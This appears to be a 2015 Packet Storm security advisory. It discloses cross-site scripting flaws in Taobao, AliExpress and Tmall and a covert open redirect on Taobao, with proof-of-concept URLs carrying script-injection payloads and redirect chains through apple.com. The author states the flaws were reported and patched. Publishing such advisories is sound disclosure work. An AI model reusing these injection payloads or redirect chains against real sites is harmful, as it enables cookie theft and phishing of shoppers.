exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Alibaba Cross Site Scripting / Open Redirect

Alibaba Cross Site Scripting / Open Redirect
Posted Jan 23, 2015
Authored by Jing Wang

Various Alibaba sites suffer from cross site scripting and open redirect vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 4122adb3397a297f4e601144cc131e86b766b44301d48f154f47babf55aaeed6

Alibaba Cross Site Scripting / Open Redirect

Change Mirror Download
*Alibaba Taobao, AliExpress, Tmall, Online Electronic Shopping Website XSS
& Open Redirect Security Vulnerabilities*

*Domains Basic:*
Alibaba Taobao, AliExpress, Tmall are the top three online shopping
websites belonging to Alibaba.

Vulnerability Discover:
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and
Mathematical Sciences (SPMS), Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/



*(1) Domains Description:*


*(1.1) http://www.taobao.com <http://www.taobao.com>*

“Taobao is a Chinese website for online shopping similar to eBay and Amazon
that is operated in China by Alibaba Group.” (Wikipedia)

“With around 760 million product listings as of March 2013, Taobao
Marketplace is one of the world’s top 10 most visited websites according to
Alexa. For the year ended March 31, 2013, the combined gross merchandise
volume (GMV) of Taobao Marketplace and Tmall.com exceeded 1 trillion yuan.”
(Wikipedia)

Alexa ranking 9 at 10:40 am Thursday, 22 January 2015 (GMT+8).


*(1.2) http://aliexpress.com <http://aliexpress.com>*

"Launched in 2010, AliExpress.com is an online retail service made up of
mostly small Chinese businesses offering products to international online
buyers. It is the most visited e-commerce website in Russia" (Wikipedia)


*(1.3) http://www.tmall.com <http://www.tmall.com>*

"Taobao Mall, is a Chinese-language website for business-to-consumer (B2C)
online retail, spun off from Taobao, operated in the People's Republic of
China by Alibaba Group. It is a platform for local Chinese and
international businesses to sell brand name goods to consumers in mainland
China, Hong Kong, Macau and Taiwan." (Wikipedia)





*(2) Vulnerability descriptions:*
Alibaba Taobao AliExpress Tmall online electronic shopping website has a
security problem. It can be exploited by XSS and Covert Redirect attacks.





*(3) Alibaba Taobao, AliExpress, Tmall, Online Electronic Shopping Website
XSS Security Vulnerabilities*

The vulnerability can be exploited without user login. Tests were performed
on Firefox (34.0) in Ubuntu (14.04) and IE (8.0.7601) in Windows 7.



*(3.1) Alibaba Taobao Online Electronic Shopping Website (Taobao.com ) XSS
(cross site scripting) Security Vulnerability*

The vulnerabilities occur at “writecookie.php?" page with "ck" parameter,
e.g
http://www.taobao.com/go/rgn/tw/writecookie.php?ck=tw&redirect=0

*POC Code:*
http://www.taobao.com/go/rgn/tw/writecookie.php?ck=tw"-->'-alert(/tetraph/
)-'";&redirect=0


*POC Video:*
https://www.youtube.com/watch?v=cLzKxZ74i6Q&feature=youtu.be
*Blog Details:*
http://securityrelated.blogspot.com/2015/01/alibaba-taobao-online-electronic.html




*(3.2) Alibaba AliExpress Online Electronic Shopping Website
(Aliexpress.com) XSS Security Vulnerabilities*

The vulnerabilities occur at “landing.php?" page with "cateid" "fromapp"
parameters, e.g
http://activities.aliexpress.com/mobile_325_promotion_landing.php?cateid=3&fromapp=

*POC Code:*
/' "><img src=x onerror=prompt(/tetraph/)>
http://activities.aliexpress.com/mobile_325_promotion_landing.php?cateid=6&fromapp=/'
"><img src=x onerror=prompt(/tetraph/)>
http://activities.aliexpress.com/mobile_325_promotion_landing.php?cateid=6</script>/'
"><img src=x onerror=prompt(/tetraph/)><!--&fromapp=


*POC Video:*
https://www.youtube.com/watch?v=YShEdXo3q2c&feature=youtu.be
*Blog Details:*
http://securityrelated.blogspot.com/2015/01/alibaba-aliexpress-online-electronic.html




*(3.3) Alibaba Tmall Online Electronic Shopping Website (Tmall.com) XSS
Security Vulnerability *

The vulnerabilities occur at “writecookie.php?" page with "ck" parameter,
e.g
http://www.tmall.com/go/app/sea/writecookie.php?ck=cn&redirect=11

*POC Code:*
http://www.tmall.com/go/app/sea/writecookie.php?ck=cn"-->'-alert(/tetraph/
)-'";&redirect=1


*POC Video:*
https://www.youtube.com/watch?v=k1QkoacdI1U&feature=youtu.be
*Blog Details:*
http://securityrelated.blogspot.com/2015/01/alibaba-tmall-online-electronic.html





*(4) Alibaba Taobao(taobao.com <http://taobao.com>)Covert Redirect Security
Vulnerability Based on Apple.com*

*(4.1) Vulnerability description:*
Alibaba Taobao has a security problem. It can be exploited by Covert
Redirect attacks. Taobao will check whether the redirected URL belongs to
domains in Taobao's whitelist, e.g.
apple.com

If this is true, the redirection will be allowed.

However, if the URLs in a redirected domain have open URL redirection
vulnerabilities themselves, a user could be redirected from Taobao to a
vulnerable URL in that domain first and later be redirected from this
vulnerable site to a malicious site. This is as if being redirected from
Taobao directly.

In fact, Apple.com was found can be exploited by Open Redirect
vulnerabilities. Those vulnerabilities details will be published in the
near future.


*(4.2) *The vulnerability occurs at "redirect.htm?" page, with parameter
“&url”, i.e.
http://app.taobao.com/redirect.htm?url=http://itunes.apple.com/

The vulnerabilities can be attacked without user login. Tests were
performed on IE (10.0) of Windows 8, Firefox (34.0) & Google Chromium
39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) of Ubuntu (14.04),Safari 6.1.6
of Mac OS X Lion 10.7.


*(4.3) *Use a website for the tests,the redirected webpage is “
http://www.tetraph.com/blog". Just suppose it is malicious.

*Vulnerable URL:*
http://app.taobao.com/redirect.htm?url=http://itunes.apple.com/

*POC Code:*
http://app.taobao.com/redirect.htm?url=http://apple.com/yahoo
http://app.taobao.com/redirect.htm?url=http://apple.com/facebook
http://app.taobao.com/redirect.htm?url=http://apple.com/amazon


*Poc Video:*
https://www.youtube.com/watch?v=jhnaoB_eus0&feature=youtu.be
*Blog Detail:*
http://securityrelated.blogspot.com/2015/01/alibaba-taobao-taobaocom-open-redirect.html
http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html
http://tetraph.com/covert_redirect/




Those vulnerablities were reported to Alibaba in 2014 and have been patched
by the security team (just checked). Name was listed in the hall of fame by
Alibaba.
http://security.alibaba.com/people.htm?id=2048213134


*Blog Details:*
http://www.securityrelated.blogspot.com/2015/01/alibaba-taobao-aliexpress-tmall-online.html




--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close